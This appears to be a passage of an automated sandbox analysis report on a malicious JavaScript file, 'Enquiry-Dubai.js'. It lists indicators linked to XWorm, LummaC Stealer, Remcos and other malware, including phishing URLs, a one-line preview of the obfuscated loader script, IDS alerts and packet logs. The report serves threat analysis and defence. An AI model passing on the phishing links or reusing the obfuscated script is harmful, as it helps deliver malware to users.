                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            208.95.112.1shite.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            checkerrs.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            Client.exeGet hashmaliciousQuasarBrowse
                                                                            • ip-api.com/json/
                                                                            H67PoQSrNz.exeGet hashmaliciousQuasarBrowse
                                                                            • ip-api.com/json/
                                                                            SecuriteInfo.com.Win64.Evo-gen.11723.19544.exeGet hashmaliciousSkuld StealerBrowse
                                                                            • ip-api.com/json
                                                                            Luna.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            SynovaDarkX.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/csv/?fields=status,query
                                                                            WizClient.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            WizClient.exeGet hashmaliciousXWormBrowse
                                                                            • ip-api.com/line/?fields=hosting
                                                                            RegblockerDrivers.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                            • ip-api.com/json/?fields=225545
                                                                            207.241.227.224s.vbsGet hashmaliciousXWormBrowse
                                                                              givingbestthingsalwaysfor.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                                                                dokument wysy#U00c5 kowy faktury nr 52-FK-25.jsGet hashmaliciousFormBookBrowse
                                                                                  dokument wysy#U00c5 kowy faktury nr 52-FK-25.jsGet hashmaliciousFormBookBrowse
                                                                                    172.66.0.235http://pub-c9aef0442ab34f3294823bcd6e71d691.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-c9aef0442ab34f3294823bcd6e71d691.r2.dev/index.html
                                                                                    http://pub-cd02ac1851fc463cad683b79eebe7eeb.r2.dev/D0CUSIGN.htmlGet hashmaliciousUnknownBrowse
                                                                                    • pub-cd02ac1851fc463cad683b79eebe7eeb.r2.dev/D0CUSIGN.html
                                                                                    http://pub-b8dd5671c8bb42deae38e08d92d0512c.r2.dev/owaaa.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-b8dd5671c8bb42deae38e08d92d0512c.r2.dev/owaaa.html
                                                                                    http://pub-e982086700aa4316b45fa68e28664ed2.r2.dev/doc4.html?folder=iusq7f8ur&Get hashmaliciousUnknownBrowse
                                                                                    • pub-e982086700aa4316b45fa68e28664ed2.r2.dev/doc4.html?folder=iusq7f8ur&
                                                                                    http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html
                                                                                    http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                                                                                    http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                                                                                    http://pub-8e63a3fd3e394785b247e694bb9ef841.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-8e63a3fd3e394785b247e694bb9ef841.r2.dev/favicon.ico
                                                                                    http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?eGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e
                                                                                    http://pub-ba5a046c69974217b0431bca4ba43740.r2.dev/rep.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • pub-ba5a046c69974217b0431bca4ba43740.r2.dev/rep.html

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ip-api.comshite.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    checkerrs.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    Client.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    H67PoQSrNz.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    SecuriteInfo.com.Win64.Evo-gen.11723.19544.exeGet hashmaliciousSkuld StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    Luna.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    SynovaDarkX.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    RegblockerDrivers.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                    • 208.95.112.1
                                                                                    pki-goog.l.google.comPD4OaBeAiY.exeGet hashmaliciousDanaBotBrowse
                                                                                    • 142.251.32.99
                                                                                    1D9RNWJNQB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 142.250.80.99
                                                                                    RPuo9hLUBb.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 142.251.40.227
                                                                                    weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 142.250.80.99
                                                                                    weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 142.251.40.163
                                                                                    CVerify.batGet hashmaliciousUnknownBrowse
                                                                                    • 142.251.35.163
                                                                                    Set-up_patched.exeGet hashmaliciousDarkTortilla, LummaC StealerBrowse
                                                                                    • 142.250.72.99
                                                                                    s.vbsGet hashmaliciousXWormBrowse
                                                                                    • 142.250.65.227
                                                                                    alex1212.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 142.251.40.195
                                                                                    OkH8IPF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 142.250.65.163
                                                                                    bg.microsoft.map.fastly.netreverseshell bash64.batGet hashmaliciousQuasarBrowse
                                                                                    • 199.232.210.172
                                                                                    1200000.MSBuild.exeGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.214.172
                                                                                    MasonRootkit.exeGet hashmaliciousXWormBrowse
                                                                                    • 199.232.214.172
                                                                                    PD4OaBeAiY.exeGet hashmaliciousDanaBotBrowse
                                                                                    • 199.232.214.172
                                                                                    RPuo9hLUBb.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 199.232.210.172
                                                                                    x2ojTWdCAK.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                    • 199.232.210.172
                                                                                    noKdGjmCji.exeGet hashmaliciousSheetRatBrowse
                                                                                    • 199.232.210.172
                                                                                    weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 199.232.210.172
                                                                                    weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 199.232.214.172
                                                                                    GreenHat (1).zipGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.214.172
                                                                                    ia600204.us.archive.orgs.vbsGet hashmaliciousXWormBrowse
                                                                                    • 207.241.227.224
                                                                                    givingbestthingsalwaysfor.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                                                                    • 207.241.227.224
                                                                                    dokument wysy#U00c5 kowy faktury nr 52-FK-25.jsGet hashmaliciousFormBookBrowse
                                                                                    • 207.241.227.224
                                                                                    dokument wysy#U00c5 kowy faktury nr 52-FK-25.jsGet hashmaliciousFormBookBrowse
                                                                                    • 207.241.227.224

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUShttps://smbcvpasscadb.shop/%E2%B1%BD%E1%B5%96%E1%B5%83%CB%A2%CB%A2Get hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    u4K82586fa.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.12.205
                                                                                    1D9RNWJNQB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.96.1
                                                                                    EFJl5AgCTf.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.218.154
                                                                                    RPuo9hLUBb.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.23.201
                                                                                    shipment particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    0DqvrEKe3u.exeGet hashmaliciousDarkVision RatBrowse
                                                                                    • 104.26.9.202
                                                                                    Invoice Number INV132146-1.pdfGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.27.152
                                                                                    weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.72.121
                                                                                    LauncherV8.exeGet hashmaliciousLummaC Stealer, Salat StealerBrowse
                                                                                    • 172.67.222.162
                                                                                    TUT-ASUSshite.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    checkerrs.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    Client.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    H67PoQSrNz.exeGet hashmaliciousQuasarBrowse
                                                                                    • 208.95.112.1
                                                                                    SecuriteInfo.com.Win64.Evo-gen.11723.19544.exeGet hashmaliciousSkuld StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    Luna.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    SynovaDarkX.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 208.95.112.1
                                                                                    RegblockerDrivers.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                    • 208.95.112.1
                                                                                    INTERNET-ARCHIVEUSs.vbsGet hashmaliciousXWormBrowse
                                                                                    • 207.241.227.224
                                                                                    givingbestthingsalwaysfor.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                                                                    • 207.241.227.224
                                                                                    dokument wysy#U00c5 kowy faktury nr 52-FK-25.jsGet hashmaliciousFormBookBrowse
                                                                                    • 207.241.227.224
                                                                                    RFQ - MAWARIS-025.jsGet hashmaliciousFormBookBrowse
                                                                                    • 207.241.227.197
                                                                                    dokument wysy#U00c5 kowy faktury nr 52-FK-25.jsGet hashmaliciousFormBookBrowse
                                                                                    • 207.241.227.224
                                                                                    https://archive.org/download/chilledwindows_2017Get hashmaliciousUnknownBrowse
                                                                                    • 207.241.224.2
                                                                                    INVSO269936_pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                    • 207.241.224.2
                                                                                    https://anish-123-2006.github.io/netflixcloneGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 207.241.237.3
                                                                                    20250120.jsGet hashmaliciousUnknownBrowse
                                                                                    • 207.241.227.155
                                                                                    kissmewithlovesheisfineforme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                    • 207.241.227.155
                                                                                    CONTABODEWRvqVqu2vk.exeGet hashmaliciousUnknownBrowse
                                                                                    • 164.68.120.123
                                                                                    WRvqVqu2vk.exeGet hashmaliciousUnknownBrowse
                                                                                    • 164.68.120.123
                                                                                    GUYBIN.ps1Get hashmaliciousFormBookBrowse
                                                                                    • 173.212.221.162
                                                                                    slb.exeGet hashmaliciousFormBookBrowse
                                                                                    • 173.212.221.162
                                                                                    bestbeautifulthingsentiretimebetterresultsgive.htaGet hashmaliciousUnknownBrowse
                                                                                    • 144.91.127.5
                                                                                    bin.exeGet hashmaliciousFormBookBrowse
                                                                                    • 173.212.221.162
                                                                                    https://www.google.com/url?q=https%3A%2F%2Fme.pwvk4.shop%2Feco.html&sa=D&sntz=1&usg=AOvVaw0TH_t6elPUdrmLbkcii4ceGet hashmaliciousUnknownBrowse
                                                                                    • 173.212.192.171
                                                                                    milkmaidproductsareveryniceforentiretimetogivemebest.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                    • 144.91.127.5
                                                                                    sheisverybeautifulgirlwithnicelipsandallgreat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                    • 144.91.127.5
                                                                                    Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 144.91.127.5

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    28a2c9bd18a11de089ef85a160da29e4PD4OaBeAiY.exeGet hashmaliciousDanaBotBrowse
                                                                                    • 204.79.197.222
                                                                                    1D9RNWJNQB.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 204.79.197.222
                                                                                    weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 204.79.197.222
                                                                                    build_59.exeGet hashmaliciousGo StealerBrowse
                                                                                    • 204.79.197.222
                                                                                    24fba8e4dbb590f5038a9ede54af87de.exeGet hashmaliciousCoinhive, Sapphire, TrojanRansom, WarGame, Xmrig, ZhenBrowse
                                                                                    • 204.79.197.222
                                                                                    https://play.gooogle.com.store.apps.h0316.gooogdk.xyz/Get hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.222
                                                                                    https://paintingwithatwist.acemlnb.com/lt.php?x=3DZy~GE5UFbL65B~yg1JgRJr3KFSvgTykMsvXKHMJXmiD8F--ky.1eRw3XMmmNLwlegvbHLIIYGe5pV-yd1Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 204.79.197.222
                                                                                    Nw-Inst64.exe.bin.exeGet hashmaliciousDCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                    • 204.79.197.222
                                                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.222
                                                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.222
                                                                                    3b5074b1b5d032e5620f69f9f700ff0ereverseshell bash64.batGet hashmaliciousQuasarBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    EFJl5AgCTf.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    LauncherV8.exeGet hashmaliciousLummaC Stealer, Salat StealerBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    SecuriteInfo.com.Trojan.MulDrop11.61605.10952.23050.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    SecuriteInfo.com.Trojan.MulDrop11.61605.10952.23050.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    SynovaDarkX.exeGet hashmaliciousXWormBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    Client-built.exeGet hashmaliciousDiscord RatBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224
                                                                                    WizClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 172.66.0.235
                                                                                    • 207.241.227.224

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1940658735648508
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:NlllulJnp/p:NllU
                                                                                    MD5:BC6DB77EB243BF62DC31267706650173
                                                                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:@...e.................................X..............@..........

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pspghcsg.0pg.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcjk5g0n.p3f.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:ASCII text, with very long lines (307), with CRLF line terminators
                                                                                    Entropy (8bit):4.449534633378126
                                                                                    TrID:
                                                                                      File name:Enquiry-Dubai.js
                                                                                      File size:1'362'606 bytes
                                                                                      MD5:5e554206a8a10362c32d4f106ce72a98
                                                                                      SHA1:9a7ab75af22bb0ed7e0a3feb49eef5cff3d22aba
                                                                                      SHA256:61d6d15b22aed7572cca9b5785f07f02eec562a4142c2fb8605dabc89d7710b5
                                                                                      SHA512:70bb80985910c275d098ba9f18e3c98a216ce082dc30cba8172374dd5150341d523e4ce5359cf00459b5b102fe2429f3e77148a2281808232d299df25be56e3e
                                                                                      SSDEEP:384:kTTTTTTTTTFTTTTTTTTTFTTTTTTTTTFTTTTTTTTTFTTTTTTTTTTTTTTTTTTTTTTZ:mgrS
                                                                                      TLSH:5E55ED9AE32B0EA2F4CB01DB043C9C904DDE5DD5A9D33B9DEB35A0641E4486DE6B3478
                                                                                      File Content Preview:..var Kursk = ([]+[ ([]["carinately"]+[])[0] + ([]["brite"]+[])[1] + ([]["helygia"]+[])[2] + ([]["creance"]+[])[3] + ([]["osteria"]+[])[4] + ([]["iodargyrites"]+[])[5] + ([]["overcautiously"]+[])[6] + ([]["briteMap"]+[])[7] + ([]["tetrahydric"]+[])[8] +

                                                                                      File Icon

                                                                                      Icon Hash:68d69b8bb6aa9a86

                                                                                      Network Behavior

                                                                                      Download Network PCAP: filteredfull

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-03-23T21:49:02.447982+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21207.241.227.224443192.168.2.449716TCP
                                                                                      2025-03-23T21:49:03.955868+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21172.66.0.235443192.168.2.449723TCP
                                                                                      2025-03-23T21:49:04.104187+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1172.66.0.235443192.168.2.449723TCP
                                                                                      2025-03-23T21:49:04.104187+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1172.66.0.235443192.168.2.449723TCP

                                                                                      Network Port Distribution

                                                                                      • Total Packets: 731
                                                                                      • 587 undefined
                                                                                      • 443 (HTTPS)
                                                                                      • 80 (HTTP)
                                                                                      • 53 (DNS)
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 23, 2025 21:48:40.816167116 CET49671443192.168.2.4204.79.197.203
                                                                                      Mar 23, 2025 21:48:41.127703905 CET49671443192.168.2.4204.79.197.203
                                                                                      Mar 23, 2025 21:48:41.737081051 CET49671443192.168.2.4204.79.197.203
                                                                                      Mar 23, 2025 21:48:42.940222979 CET49671443192.168.2.4204.79.197.203
                                                                                      Mar 23, 2025 21:48:45.346455097 CET49671443192.168.2.4204.79.197.203
                                                                                      Mar 23, 2025 21:48:49.584731102 CET49678443192.168.2.420.189.173.27
                                                                                      Mar 23, 2025 21:48:49.893321991 CET49678443192.168.2.420.189.173.27
                                                                                      Mar 23, 2025 21:48:50.158956051 CET49671443192.168.2.4204.79.197.203
                                                                                      Mar 23, 2025 21:48:50.502712011 CET49678443192.168.2.420.189.173.27
                                                                                      Mar 23, 2025 21:48:51.705847025 CET49678443192.168.2.420.189.173.27
                                                                                      Mar 23, 2025 21:48:54.112103939 CET49678443192.168.2.420.189.173.27
                                                                                      Mar 23, 2025 21:48:54.596800089 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:54.596915007 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:54.597033978 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:54.607636929 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:54.607671022 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:54.952392101 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:54.952526093 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.041908979 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.041965008 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.042994022 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.096600056 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.120132923 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.160347939 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446538925 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446571112 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446580887 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446598053 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446607113 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446614981 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446677923 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.446722031 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.446772099 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.446796894 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.447200060 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.447221994 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.447314024 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.447329998 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.447452068 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.608345032 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.608378887 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.608468056 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.608506918 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.608541965 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.608611107 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.609549999 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.609570980 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.609652996 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.609668970 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.609731913 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.610018969 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.610042095 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.610101938 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.610115051 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.610143900 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.610168934 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.773859024 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.773889065 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.773947954 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.773971081 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.773988962 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774023056 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774040937 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774058104 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774065971 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774104118 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774132967 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774157047 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774199009 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774205923 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774215937 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774234056 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774238110 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774291039 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774292946 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774305105 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774339914 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774348021 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774370909 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774378061 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774389982 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774419069 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774422884 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774470091 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774477005 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.774507046 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.774538040 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.934418917 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.934458971 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.934561968 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.934608936 CET44349716207.241.227.224192.168.2.4
                                                                                      Mar 23, 2025 21:48:55.934648037 CET49716443192.168.2.4207.241.227.224
                                                                                      Mar 23, 2025 21:48:55.934845924 CET49716443192.168.2.4207.241.227.224
